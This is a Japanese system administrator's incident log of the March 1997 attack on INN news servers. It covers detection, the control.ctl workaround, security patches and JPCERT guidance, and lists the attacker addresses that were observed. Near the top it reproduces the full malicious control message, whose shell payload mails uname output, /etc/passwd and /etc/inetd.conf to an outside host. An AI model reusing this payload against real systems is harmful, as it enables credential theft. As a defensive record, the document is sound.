技術情報
ことの始まり (1997.3.17 7:58)
このようなメールがニュースシステムから管理者に届く
注) 実際は1997年3月15日からアタックが始まっていたようである
To: news
Subject: Bad header by tale@uunet.uu.net

Path:xxxxx.co.jp!news6-tokyonet!tokyonet.ad.jp!wnoc-tyo-news!wnoc-sfc-news!wnoc-kyo-news!kuis-news!wsclark!hoku7!rcnp!odins-suita!chiba-ns!kinds.kumamoto-u.ac.jp!hakozaki.karrn!csis.oita-u!nns_oec-net!newssvt.os!newssvt02.os!newssv.movenet!newssvt02.tk!news-penn.gsl.net!news.gsl.net!news.RoSprint.net!news.master.ru!news.telekom.ru!demos!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back 
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9121@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bin/mailx root@[193.12.106.1]
#-

~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this
メールスプールを確認すると出ていこうとしている(1997.3.17 10時頃)
すでに送り先のホストが止まっているようで出ていかなかったが、削除した。 
# ls -lg
total 28
-rw-------   1 root     kmem         5156 Mar 17 07:55 dfHAA13624
-rw-------   1 root     kmem         5156 Mar 17 07:56 dfHAA13634
-rw-------   1 root     kmem         5156 Mar 17 07:58 dfHAA13644
-rw-------   1 root     kmem         5156 Mar 17 07:59 dfHAA13654
-rw-------   1 root     kmem          480 Mar 17 12:03 qfHAA13624
-rw-------   1 root     kmem          480 Mar 17 12:03 qfHAA13634
-rw-------   1 root     kmem          480 Mar 17 12:03 qfHAA13644
-rw-------   1 root     kmem          480 Mar 17 12:03 qfHAA13654

innのバージョンの確認方法
telnet localhost nntp

innのセキュリティーホールを使った攻撃であるらしい (1997.3.17 12:00)
control.ctlの中の 
  all:*:*:mail を
  all:*:*:log=default
にすれば対応できると聞いて修正

それでも攻撃はなおも続く
Mar 17 10:27:29 xxxxxx sendmail[15014]:JAA14995:to=, delay=00:41:05,xdelay=00:00:05,mailer=smtp, relay=owlnet.rice.edu.[128.42.52.1], stat=Sent (TAA27084 Message accepted for delivery)

東京インターネットへの問い合わせの回答がくる (1997.3.17 14:36)
Bad Headerが出ていればはじかれている」という認識の 様だったのでこちらの状態を報告
CERTからの文章をもらう

NetNews Administrator's Mailing Listへの参加 (1997.3.17 16:59)
とても1人では手に負えそうにないのでnnadm-admin@sol.cs.ritsumei.ac.jpへ参加の申し込みを送ると登録してくれます。

innの入れ換え (1997.3.18 9:00)
inn1.4を使用していたのでinn1.4unoff4+securtypatchをインストールする

パッチを当てた後の攻撃 (1997.3.18 11:27)
これではじかれている事になるのだろう? 
Date: Tue, 18 Mar 1997 11:27:51 +0900
From: news
Message-Id: <199703180227.LAA09912@xxxxxx.ooooo.co.jp>
To: usenet
Subject: Malformed newsgroup name by tale@uunet.uu.net
innのパッチ情報 (1997.3.19)
1997年3月19日になって、inn1.4unoff3, inn1.4unoff4に対するパッチはsecurity-patch.03を使うようにhttp://www.jpcert.or.jp/info/97-0002/に書かれていた。

security-patch.03をgetしてきて再度作業 (1997.3.19 9:00)
当初の情報ではinn1.4unoff4にはsecurity-patch.01を使うとあったが、security-patch.03が推奨されていたので再度作業を行なった

流れたコントロールメッセージ
以下のアドレスに/etc/passwdや/etc/inetd.confを送るようにアタックを受けているはずである。
mailqで出ていこうとしているメールが無いか確認し、もし残っていれば/usr/spool/mqueueから削除する事。また/var/log/syslogの内容もチェックし、もしSentがあれば/etc/passwdファイルも変更する
詳細はJPCERTのページで確認すること
bin@le.owlnet.rice.edu
tale@uunet.uu.net
root@[193.12.106.1]
sysadmin@switch.ch
hydra@innocent.com
root@131.38.122.80 
193.12.106.100
sweeney@torsion.appliedtheory.com (1997.3.20)

さらに続くアタック (1997.3.20)
悪いことにこのサーバーは踏台にされていることに気が付いていな いのでパッチを当てていないinnを使っているところは相当数 /etc/passwdをメールで盗まれている
telnet torsion.appliedtheory.com smtp
Trying...
Connected to torsion.appliedtheory.com.
Escape character is '^]'.
220 torsion.appliedtheory.com ESMTP Sendmail 8.8.5/8.7.3; Wed,19 Mar 1997 21:10
:16 -0500 (EST)

確認できたアタックのコントロールメッセージとメールの宛先
1997.3.21まで確認できたアタックのコントロールメッセージとメールの宛先
Message-ID: Address

root@[193.12.106.1]
<332f807b.345786827@news.bangla.net>hydra@innocent.com

sysadmin@switch.ch
<830201540.9020@uunet.uu.net> telnet 193.12.106.100 23
<test$4rf@mcrware.microware.com>kalle root
<5gnjeo$6c9@paf-news.hqpacaf.af.mil> root@131.38.122.80
<5gp3np$4n@news.appliedtheory.com>sweeney@torsion.appliedtheory.com
<5gp6v5$gm@news.appliedtheory.com>sweeney@torsion.appliedtheory.com
<830201541.9223@uunet.uu.net>nado k@bbs.uanet.kharkov.ua
<5gnhfi$6c9@paf-news.hqpacaf.af.mil>root@[131.38.122.187]
<5gp1vp$t6h@news.appliedtheory.com>sweeney@torsion.appliedtheory.com
1997.3.22に確認できたアタックのコントロールメッセージとメールの宛先
Message-ID:Address
<830201540.9220@uunet.uu.test1>libja@sunrise.pg.gda.pl
<830201540.9220@uunet.uu.damian>postmaster@153.19.40.230
1997.3.24に確認できたアタックのコントロールメッセージとメールの宛先
Message-ID:Address
<830201540.9220@uunet.uu.test1> libja@sunrise.pg.gda.pl
<Y5gkdv8$5uc@tabloid.amoco.com>sdblanch@dpcmail
<T5gkdv8$5uc@tabloid.amoco.com>sdblanch@dpcmail
1997.3.27に確認できたアタックのコントロールメッセージとメールの宛先
Message-ID:Address
<5ha2ag$ovl@jcnews.kokusen.go.jp>jcic@kokusen.go.jp

1997.4.4 security-patch.05が配布される
security-patch.04が先に出されたがバグがあったようなのでsecurity-patch.05を入手。
The security patch has been moved. Get the new file security-patch.05. The
PGP and MD5 signature are available. The PGP key used to sign isavailable
by fingering brister@gw.home.vix.com , or from the public key servers (user
id brister@vix.com)